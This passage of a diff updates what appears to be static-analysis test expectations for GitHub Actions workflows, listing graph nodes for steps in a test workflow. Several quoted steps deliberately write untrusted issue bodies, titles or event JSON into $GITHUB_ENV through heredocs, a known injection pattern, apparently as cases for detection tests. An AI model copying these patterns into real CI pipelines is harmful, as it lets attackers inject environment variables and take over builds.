| EOF=$(dd if=/dev/urandom bs=15 count=1 status=none \| base64)\necho "status<<$EOF" >> $GITHUB_OUTPUT\necho "$(cat status.output.json)" >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:9:5:33:14 | Job: Test | +| .github/workflows/multiline.yml:15:9:20:6 | Run Step | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:15:14:19:40 | EOF=$(dd if=/dev/urandom bs=15 count=1 status=none \| base64)\necho "status<<$EOF" >> $GITHUB_OUTPUT\necho "$(cat status.output.json)" >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:15:14:19:40 | EOF=$(dd if=/dev/urandom bs=15 count=1 status=none \| base64)\necho "status<<$EOF" >> $GITHUB_OUTPUT\necho "$(cat status.output.json)" >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | | .github/workflows/multiline.yml:15:14:19:40 | EOF=$(dd if=/dev/urandom bs=15 count=1 status=none \| base64)\necho "status<<$EOF" >> $GITHUB_OUTPUT\necho "$(cat status.output.json)" >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:15:9:20:6 | Run Step | -| .github/workflows/multiline.yml:20:9:24:6 | Run Step | .github/workflows/multiline.yml:9:5:33:14 | Job: Test | -| .github/workflows/multiline.yml:20:14:23:40 | echo "response<<$EOF" >> $GITHUB_OUTPUT\necho $output >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:1:1:33:14 | on: | -| .github/workflows/multiline.yml:20:14:23:40 | echo "response<<$EOF" >> $GITHUB_OUTPUT\necho $output >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:9:5:33:14 | Job: Test | +| .github/workflows/multiline.yml:20:9:24:6 | Run Step | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:20:14:23:40 | echo "response<<$EOF" >> $GITHUB_OUTPUT\necho $output >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:20:14:23:40 | echo "response<<$EOF" >> $GITHUB_OUTPUT\necho $output >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | | .github/workflows/multiline.yml:20:14:23:40 | echo "response<<$EOF" >> $GITHUB_OUTPUT\necho $output >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:20:9:24:6 | Run Step | -| .github/workflows/multiline.yml:24:9:30:6 | Run Step | .github/workflows/multiline.yml:9:5:33:14 | Job: Test | -| .github/workflows/multiline.yml:24:14:29:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:1:1:33:14 | on: | -| .github/workflows/multiline.yml:24:14:29:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:9:5:33:14 | Job: Test | +| .github/workflows/multiline.yml:24:9:30:6 | Run Step | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:24:14:29:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:24:14:29:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | | .github/workflows/multiline.yml:24:14:29:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:24:9:30:6 | Run Step | -| .github/workflows/multiline.yml:30:9:33:14 | Run Step | .github/workflows/multiline.yml:9:5:33:14 | Job: Test | -| .github/workflows/multiline.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | .github/workflows/multiline.yml:1:1:33:14 | on: | -| .github/workflows/multiline.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | .github/workflows/multiline.yml:9:5:33:14 | Job: Test | -| .github/workflows/multiline.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | .github/workflows/multiline.yml:30:9:33:14 | Run Step | +| .github/workflows/multiline.yml:30:9:34:6 | Run Step | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | .github/workflows/multiline.yml:30:9:34:6 | Run Step | | .github/workflows/multiline.yml:32:13:32:39 | toJson(github.event) | .github/workflows/multiline.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | +| .github/workflows/multiline.yml:34:9:40:6 | Run Step | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:34:15:34:23 | heredoc11 | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:34:15:34:23 | heredoc11 | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:34:15:34:23 | heredoc11 | .github/workflows/multiline.yml:34:9:40:6 | Run Step | +| .github/workflows/multiline.yml:35:14:39:14 | cat >> $GITHUB_ENV << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:35:14:39:14 | cat >> $GITHUB_ENV << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:35:14:39:14 | cat >> $GITHUB_ENV << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline.yml:34:9:40:6 | Run Step | +| .github/workflows/multiline.yml:40:9:46:6 | Run Step | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:40:15:40:23 | heredoc12 | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:40:15:40:23 | heredoc12 | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:40:15:40:23 | heredoc12 | .github/workflows/multiline.yml:40:9:46:6 | Run Step | +| .github/workflows/multiline.yml:41:14:45:14 | cat > issue.txt << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:41:14:45:14 | cat > issue.txt << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:41:14:45:14 | cat > issue.txt << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline.yml:40:9:46:6 | Run Step | +| .github/workflows/multiline.yml:46:9:52:6 | Run Step | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:46:15:46:23 | heredoc21 | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:46:15:46:23 | heredoc21 | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:46:15:46:23 | heredoc21 | .github/workflows/multiline.yml:46:9:52:6 | Run Step | +| .github/workflows/multiline.yml:47:14:51:14 | cat << EOL >> $GITHUB_ENV\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:47:14:51:14 | cat << EOL >> $GITHUB_ENV\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:47:14:51:14 | cat << EOL >> $GITHUB_ENV\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline.yml:46:9:52:6 | Run Step | +| .github/workflows/multiline.yml:52:9:58:6 | Run Step | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:52:15:52:23 | heredoc22 | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:52:15:52:23 | heredoc22 | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:52:15:52:23 | heredoc22 | .github/workflows/multiline.yml:52:9:58:6 | Run Step | +| .github/workflows/multiline.yml:53:14:57:14 | cat < file.txt\nHello\nWorld\nEOF\n | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:53:14:57:14 | cat < file.txt\nHello\nWorld\nEOF\n | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:53:14:57:14 | cat < file.txt\nHello\nWorld\nEOF\n | .github/workflows/multiline.yml:52:9:58:6 | Run Step | +| .github/workflows/multiline.yml:58:9:63:6 | Run Step | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:58:15:58:23 | heredoc23 | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:58:15:58:23 | heredoc23 | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:58:15:58:23 | heredoc23 | .github/workflows/multiline.yml:58:9:63:6 | Run Step | +| .github/workflows/multiline.yml:59:14:62:14 | cat <<-EOF >> "$GITHUB_ENV"\necho "FOO=$TITLE"\nEOF\n | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:59:14:62:14 | cat <<-EOF >> "$GITHUB_ENV"\necho "FOO=$TITLE"\nEOF\n | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:59:14:62:14 | cat <<-EOF >> "$GITHUB_ENV"\necho "FOO=$TITLE"\nEOF\n | .github/workflows/multiline.yml:58:9:63:6 | Run Step | +| .github/workflows/multiline.yml:63:9:66:6 | Run Step | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:63:15:63:19 | line1 | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:63:15:63:19 | line1 | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:63:15:63:19 | line1 | .github/workflows/multiline.yml:63:9:66:6 | Run Step | +| .github/workflows/multiline.yml:64:14:65:136 | echo REPO_NAME=$(cat issue.txt \| sed 's/\\\\r/\\\\n/g' \| grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' \| tr -d ' ') >> $GITHUB_ENV\n | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:64:14:65:136 | echo REPO_NAME=$(cat issue.txt \| sed 's/\\\\r/\\\\n/g' \| grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' \| tr -d ' ') >> $GITHUB_ENV\n | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:64:14:65:136 | echo REPO_NAME=$(cat issue.txt \| sed 's/\\\\r/\\\\n/g' \| grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' \| tr -d ' ') >> $GITHUB_ENV\n | .github/workflows/multiline.yml:63:9:66:6 | Run Step | +| .github/workflows/multiline.yml:66:9:71:6 | Run Step | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:66:15:66:24 | multiline1 | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:66:15:66:24 | multiline1 | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:66:15:66:24 | multiline1 | .github/workflows/multiline.yml:66:9:71:6 | Run Step | +| .github/workflows/multiline.yml:67:14:70:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:67:14:70:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:67:14:70:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | .github/workflows/multiline.yml:66:9:71:6 | Run Step | +| .github/workflows/multiline.yml:71:9:78:6 | Run Step | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:71:15:71:21 | block11 | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:71:15:71:21 | block11 | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:71:15:71:21 | block11 | .github/workflows/multiline.yml:71:9:78:6 | Run Step | +| .github/workflows/multiline.yml:72:14:77:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:72:14:77:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:72:14:77:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:71:9:78:6 | Run Step | +| .github/workflows/multiline.yml:78:9:85:6 | Run Step | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:78:15:78:21 | block12 | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:78:15:78:21 | block12 | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:78:15:78:21 | block12 | .github/workflows/multiline.yml:78:9:85:6 | Run Step | +| .github/workflows/multiline.yml:79:14:84:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:79:14:84:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:79:14:84:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:78:9:85:6 | Run Step | +| .github/workflows/multiline.yml:85:9:89:29 | Run Step | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:85:15:85:21 | block13 | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:85:15:85:21 | block13 | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:85:15:85:21 | block13 | .github/workflows/multiline.yml:85:9:89:29 | Run Step | +| .github/workflows/multiline.yml:86:14:89:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:86:14:89:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:86:14:89:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:85:9:89:29 | Run Step | | .github/workflows/test.yml:1:5:1:8 | push | .github/workflows/test.yml:1:1:40:53 | on: push | | .github/workflows/test.yml:1:5:1:8 | push | .github/workflows/test.yml:1:1:40:53 | on: push | | .github/workflows/test.yml:1:5:1:8 | push | .github/workflows/test.yml:1:5:1:8 | push | @@ -292,11 +402,11 @@ cfgNodes | .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | | .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.comment.body | | .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.issue.body | -| .github/workflows/multiline.yml:1:1:33:14 | enter on: | -| .github/workflows/multiline.yml:1:1:33:14 | exit on: | -| .github/workflows/multiline.yml:1:1:33:14 | exit on: (normal) | -| .github/workflows/multiline.yml:1:1:33:14 | on: | -| .github/workflows/multiline.yml:9:5:33:14 | Job: Test | +| .github/workflows/multiline.yml:1:1:89:29 | enter on: | +| .github/workflows/multiline.yml:1:1:89:29 | exit on: | +| .github/workflows/multiline.yml:1:1:89:29 | exit on: (normal) | +| .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:9:5:89:29 | Job: Test | | .github/workflows/multiline.yml:11:9:15:6 | Run Step | | .github/workflows/multiline.yml:11:14:14:48 | echo "changelog<> $GITHUB_OUTPUT\necho -e "$FILTERED_CHANGELOG" >> $GITHUB_OUTPUT\necho "CHANGELOGEOF" >> $GITHUB_OUTPUT\n | | .github/workflows/multiline.yml:15:9:20:6 | Run Step | @@ -305,9 +415,29 @@ cfgNodes | .github/workflows/multiline.yml:20:14:23:40 | echo "response<<$EOF" >> $GITHUB_OUTPUT\necho $output >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | | .github/workflows/multiline.yml:24:9:30:6 | Run Step | | .github/workflows/multiline.yml:24:14:29:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | -| .github/workflows/multiline.yml:30:9:33:14 | Run Step | +| .github/workflows/multiline.yml:30:9:34:6 | Run Step | | .github/workflows/multiline.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | | .github/workflows/multiline.yml:32:13:32:39 | toJson(github.event) | +| .github/workflows/multiline.yml:34:9:40:6 | Run Step | +| .github/workflows/multiline.yml:35:14:39:14 | cat >> $GITHUB_ENV << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | +| .github/workflows/multiline.yml:40:9:46:6 | Run Step | +| .github/workflows/multiline.yml:41:14:45:14 | cat > issue.txt << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | +| .github/workflows/multiline.yml:46:9:52:6 | Run Step | +| .github/workflows/multiline.yml:47:14:51:14 | cat << EOL >> $GITHUB_ENV\n${ISSUE_BODY}\nFOO\nEOL\n | +| .github/workflows/multiline.yml:52:9:58:6 | Run Step | +| .github/workflows/multiline.yml:53:14:57:14 | cat < file.txt\nHello\nWorld\nEOF\n | +| .github/workflows/multiline.yml:58:9:63:6 | Run Step | +| .github/workflows/multiline.yml:59:14:62:14 | cat <<-EOF >> "$GITHUB_ENV"\necho "FOO=$TITLE"\nEOF\n | +| .github/workflows/multiline.yml:63:9:66:6 | Run Step | +| .github/workflows/multiline.yml:64:14:65:136 | echo REPO_NAME=$(cat issue.txt \| sed 's/\\\\r/\\\\n/g' \| grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' \| tr -d ' ') >> $GITHUB_ENV\n | +| .github/workflows/multiline.yml:66:9:71:6 | Run Step | +| .github/workflows/multiline.yml:67:14:70:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | +| .github/workflows/multiline.yml:71:9:78:6 | Run Step | +| .github/workflows/multiline.yml:72:14:77:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | +| .github/workflows/multiline.yml:78:9:85:6 | Run Step | +| .github/workflows/multiline.yml:79:14:84:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | +| .github/workflows/multiline.yml:85:9:89:29 | Run Step | +| .github/workflows/multiline.yml:86:14:89:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | | .github/workflows/test.yml:1:1:40:53 | enter on: push | | .github/workflows/test.yml:1:1:40:53 | exit on: push | | .github/workflows/test.yml:1:1:40:53 | exit on: push (normal) | @@ -354,7 +484,7 @@ dfNodes | .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | | .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.comment.body | | .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.issue.body | -| .github/workflows/multiline.yml:9:5:33:14 | Job: Test | +| .github/workflows/multiline.yml:9:5:89:29 | Job: Test | | .github/workflows/multiline.yml:11:9:15:6 | Run Step | | .github/workflows/multiline.yml:11:14:14:48 | echo "changelog<> $GITHUB_OUTPUT\necho -e "$FILTERED_CHANGELOG" >> $GITHUB_OUTPUT\necho "CHANGELOGEOF" >> $GITHUB_OUTPUT\n | | .github/workflows/multiline.yml:15:9:20:6 | Run Step | @@ -363,9 +493,29 @@ dfNodes | .github/workflows/multiline.yml:20:14:23:40 | echo "response<<$EOF" >> $GITHUB_OUTPUT\necho $output >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | | .github/workflows/multiline.yml:24:9:30:6 | Run Step | | .github/workflows/multiline.yml:24:14:29:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | -| .github/workflows/multiline.yml:30:9:33:14 | Run Step | +| .github/workflows/multiline.yml:30:9:34:6 | Run Step | | .github/workflows/multiline.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | | .github/workflows/multiline.yml:32:13:32:39 | toJson(github.event) | +| .github/workflows/multiline.yml:34:9:40:6 | Run Step | +| .github/workflows/multiline.yml:35:14:39:14 | cat >> $GITHUB_ENV << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | +| .github/workflows/multiline.yml:40:9:46:6 | Run Step | +| .github/workflows/multiline.yml:41:14:45:14 | cat > issue.txt << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | +| .github/workflows/multiline.yml:46:9:52:6 | Run Step | +| .github/workflows/multiline.yml:47:14:51:14 | cat << EOL >> $GITHUB_ENV\n${ISSUE_BODY}\nFOO\nEOL\n | +| .github/workflows/multiline.yml:52:9:58:6 | Run Step | +| .github/workflows/multiline.yml:53:14:57:14 | cat < file.txt\nHello\nWorld\nEOF\n | +| .github/workflows/multiline.yml:58:9:63:6 | Run Step | +| .github/workflows/multiline.yml:59:14:62:14 | cat <<-EOF >> "$GITHUB_ENV"\necho "FOO=$TITLE"\nEOF\n | +| .github/workflows/multiline.yml:63:9:66:6 | Run Step | +| .github/workflows/multiline.yml:64:14:65:136 | echo REPO_NAME=$(cat issue.txt \| sed 's/\\\\r/\\\\n/g' \| grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' \| tr -d ' ') >> $GITHUB_ENV\n | +| .github/workflows/multiline.yml:66:9:71:6 | Run Step | +| .github/workflows/multiline.yml:67:14:70:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | +| .github/workflows/multiline.yml:71:9:78:6 | Run Step | +| .github/workflows/multiline.yml:72:14:77:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | +| .github/workflows/multiline.yml:78:9:85:6 | Run Step | +| .github/workflows/multiline.yml:79:14:84:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | +| .github/workflows/multiline.yml:85:9:89:29 | Run Step | +| .github/workflows/multiline.yml:86:14:89:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | | .github/workflows/test.yml:5:5:31:2 | Job: job1 | | .github/workflows/test.yml:8:7:10:4 | Job outputs node | | .github/workflows/test.yml:8:20:8:50 | steps.step.outputs.value | @@ -413,7 +563,7 @@ nodeLocations | .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | .github/workflows/expression_nodes.yml:20:14:21:46 | .github/workflows/expression_nodes.yml@20:14:21:46 | | .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.comment.body | .github/workflows/expression_nodes.yml:20:14:21:46 | .github/workflows/expression_nodes.yml@20:14:21:46 | | .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.issue.body | .github/workflows/expression_nodes.yml:20:14:21:46 | .github/workflows/expression_nodes.yml@20:14:21:46 | -| .github/workflows/multiline.yml:9:5:33:14 | Job: Test | .github/workflows/multiline.yml:9:5:33:14 | .github/workflows/multiline.yml@9:5:33:14 | +| .github/workflows/multiline.yml:9:5:89:29 | Job: Test | .github/workflows/multiline.yml:9:5:89:29 | .github/workflows/multiline.yml@9:5:89:29 | | .github/workflows/multiline.yml:11:9:15:6 | Run Step | .github/workflows/multiline.yml:11:9:15:6 | .github/workflows/multiline.yml@11:9:15:6 | | .github/workflows/multiline.yml:11:14:14:48 | echo "changelog<> $GITHUB_OUTPUT\necho -e "$FILTERED_CHANGELOG" >> $GITHUB_OUTPUT\necho "CHANGELOGEOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:11:14:14:48 | .github/workflows/multiline.yml@11:14:14:48 | | .github/workflows/multiline.yml:15:9:20:6 | Run Step | .github/workflows/multiline.yml:15:9:20:6 | .github/workflows/multiline.yml@15:9:20:6 | @@ -422,9 +572,29 @@ nodeLocations | .github/workflows/multiline.yml:20:14:23:40 | echo "response<<$EOF" >> $GITHUB_OUTPUT\necho $output >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:20:14:23:40 | .github/workflows/multiline.yml@20:14:23:40 | | .github/workflows/multiline.yml:24:9:30:6 | Run Step | .github/workflows/multiline.yml:24:9:30:6 | .github/workflows/multiline.yml@24:9:30:6 | | .github/workflows/multiline.yml:24:14:29:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:24:14:29:29 | .github/workflows/multiline.yml@24:14:29:29 | -| .github/workflows/multiline.yml:30:9:33:14 | Run Step | .github/workflows/multiline.yml:30:9:33:14 | .github/workflows/multiline.yml@30:9:33:14 | +| .github/workflows/multiline.yml:30:9:34:6 | Run Step | .github/workflows/multiline.yml:30:9:34:6 | .github/workflows/multiline.yml@30:9:34:6 | | .github/workflows/multiline.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | .github/workflows/multiline.yml:30:14:33:14 | .github/workflows/multiline.yml@30:14:33:14 | | .github/workflows/multiline.yml:32:13:32:39 | toJson(github.event) | .github/workflows/multiline.yml:32:13:32:39 | .github/workflows/multiline.yml@32:13:32:39 | +| .github/workflows/multiline.yml:34:9:40:6 | Run Step | .github/workflows/multiline.yml:34:9:40:6 | .github/workflows/multiline.yml@34:9:40:6 | +| .github/workflows/multiline.yml:35:14:39:14 | cat >> $GITHUB_ENV << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline.yml:35:14:39:14 | .github/workflows/multiline.yml@35:14:39:14 | +| .github/workflows/multiline.yml:40:9:46:6 | Run Step | .github/workflows/multiline.yml:40:9:46:6 | .github/workflows/multiline.yml@40:9:46:6 | +| .github/workflows/multiline.yml:41:14:45:14 | cat > issue.txt << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline.yml:41:14:45:14 | .github/workflows/multiline.yml@41:14:45:14 | +| .github/workflows/multiline.yml:46:9:52:6 | Run Step | .github/workflows/multiline.yml:46:9:52:6 | .github/workflows/multiline.yml@46:9:52:6 | +| .github/workflows/multiline.yml:47:14:51:14 | cat << EOL >> $GITHUB_ENV\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline.yml:47:14:51:14 | .github/workflows/multiline.yml@47:14:51:14 | +| .github/workflows/multiline.yml:52:9:58:6 | Run Step | .github/workflows/multiline.yml:52:9:58:6 | .github/workflows/multiline.yml@52:9:58:6 | +| .github/workflows/multiline.yml:53:14:57:14 | cat < file.txt\nHello\nWorld\nEOF\n | .github/workflows/multiline.yml:53:14:57:14 | .github/workflows/multiline.yml@53:14:57:14 | +| .github/workflows/multiline.yml:58:9:63:6 | Run Step | .github/workflows/multiline.yml:58:9:63:6 | .github/workflows/multiline.yml@58:9:63:6 | +| .github/workflows/multiline.yml:59:14:62:14 | cat <<-EOF >> "$GITHUB_ENV"\necho "FOO=$TITLE"\nEOF\n | .github/workflows/multiline.yml:59:14:62:14 | .github/workflows/multiline.yml@59:14:62:14 | +| .github/workflows/multiline.yml:63:9:66:6 | Run Step | .github/workflows/multiline.yml:63:9:66:6 | .github/workflows/multiline.yml@63:9:66:6 | +| .github/workflows/multiline.yml:64:14:65:136 | echo REPO_NAME=$(cat issue.txt \| sed 's/\\\\r/\\\\n/g' \| grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' \| tr -d ' ') >> $GITHUB_ENV\n | .github/workflows/multiline.yml:64:14:65:136 | .github/workflows/multiline.yml@64:14:65:136 | +| .github/workflows/multiline.yml:66:9:71:6 | Run Step | .github/workflows/multiline.yml:66:9:71:6 | .github/workflows/multiline.yml@66:9:71:6 | +| .github/workflows/multiline.yml:67:14:70:36 | echo 